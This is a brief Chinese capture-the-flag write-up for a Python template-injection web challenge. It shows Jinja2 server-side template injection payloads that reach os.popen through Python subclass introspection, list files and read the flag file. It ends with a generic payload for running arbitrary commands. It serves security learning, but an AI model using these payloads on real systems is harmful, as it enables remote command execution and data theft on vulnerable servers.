[wp] Web_python_template_injection 攻防世界

题目描述：

打开题目我们看到

提示python模板注入，尝试{{1+1}}看看{{}}内的代码是否被执行
由上图可知代码被执行确实存在模板注入

1.右键查看源码御剑扫描均没有任何有用信息，推测flag在某一文件里，所以我们要先获得所有文件看看能否发现疑似含有flag的文件

2.调用os模块的popen执行ls打印所有文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}

当然我们也可以用os模块的listdir来打印文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir("./")}}

发现fl4g文件，flag应该就在这个文件里，接下来想办法读取这个文件

3.执行cat命令查看目标文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}

得到flag,大功告成！

总结:这类题我们可以用下面这条语句执行命令

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("要执行的语句").read()}}

若不明白原理，可结合我这篇博客https://blog.csdn.net/zss192/article/details/104200493理解。